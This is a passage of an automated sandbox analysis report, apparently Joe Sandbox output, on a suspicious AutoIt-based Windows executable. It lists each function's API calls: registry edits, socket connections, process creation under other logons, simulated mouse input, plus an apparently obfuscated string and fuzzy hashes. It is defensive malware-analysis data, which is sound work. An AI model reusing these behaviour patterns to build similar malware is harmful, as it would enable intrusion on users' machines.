                      • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                      • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                    • GetWindowLongW.USER32(00BA2928,000000F0), ref: 0048631F
                    • GetWindowLongW.USER32(00BA2928,000000F0), ref: 00486354
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    APIs
                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                    • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                    • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                    • WSAGetLastError.WSOCK32 ref: 00476221
                    • closesocket.WSOCK32(00000000), ref: 0047624A
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                    • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                    Strings
                    • 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp, xrefs: 0048B19B, 0048B1E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID: 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp
                    • API String ID: 2294984445-3542874343
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    APIs
                    • _memset.LIBCMT ref: 0048B644
                    • _memset.LIBCMT ref: 0048B653
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                    • CloseHandle.KERNEL32 ref: 0048B694
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: oL$doL
                    • API String ID: 3277943733-3421622115
                    • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                    • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                    • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                    • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                    • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                    • EncodePointer.KERNEL32(00000000), ref: 00424097
                    • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                    • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                    • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                    • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                    • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                    • Opcode Fuzzy Hash: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                    • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                    • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                    • Opcode Fuzzy Hash: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                    • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                    APIs
                    • GetMenu.USER32(?), ref: 004857FB
                    • GetMenuItemCount.USER32(00000000), ref: 00485832
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                    • GetMenuItemID.USER32(?,?), ref: 004858C9
                    • GetSubMenu.USER32(?,?), ref: 004858D7
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 8abb9afe0d45070bc485c8e9a4be2836fff40e6f3ccda3f512a692e10a3d4860
                    • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                    • Opcode Fuzzy Hash: 8abb9afe0d45070bc485c8e9a4be2836fff40e6f3ccda3f512a692e10a3d4860
                    • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 0045EF06
                    • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                    • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                    • _memmove.LIBCMT ref: 0045EFFD
                    • VariantClear.OLEAUT32(?), ref: 0045F04A
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                    • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                    • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                    • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                    APIs
                    • _memset.LIBCMT ref: 00462258
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                    • IsMenu.USER32(00000000), ref: 004622C3
                    • CreatePopupMenu.USER32 ref: 004622F7
                    • GetMenuItemCount.USER32(000000FF), ref: 00462355
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                    • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                    • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                    • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                    • GetWindowRect.USER32(?,?), ref: 004017FE
                    • ScreenToClient.USER32(?,?), ref: 0040181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                    • EndPaint.USER32(?,?), ref: 00401876
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                    • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                    • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                    • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                    APIs
                    • ShowWindow.USER32(004C57B0,00000000,00BA2928,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                    • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                    • ShowWindow.USER32(004C57B0,00000000,00BA2928,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                    • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                    • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                    • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                    • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                    • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                      • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                    • GetDesktopWindow.USER32 ref: 004770D6
                    • GetWindowRect.USER32(00000000), ref: 004770DD
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                      • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                    • GetCursorPos.USER32(?), ref: 0047713B
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                    • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                    • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                    • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                    APIs
                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                      • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                      • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                      • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                    • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                    • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                    • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                    • HeapFree.KERNEL32(00000000), ref: 00458911
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                    • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                    • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                    • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                    • CloseHandle.KERNEL32(00000004), ref: 00458603
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                    • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                    • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                    • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                    APIs
                    • GetDC.USER32(00000000), ref: 0045B7B5
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                    • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                    • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
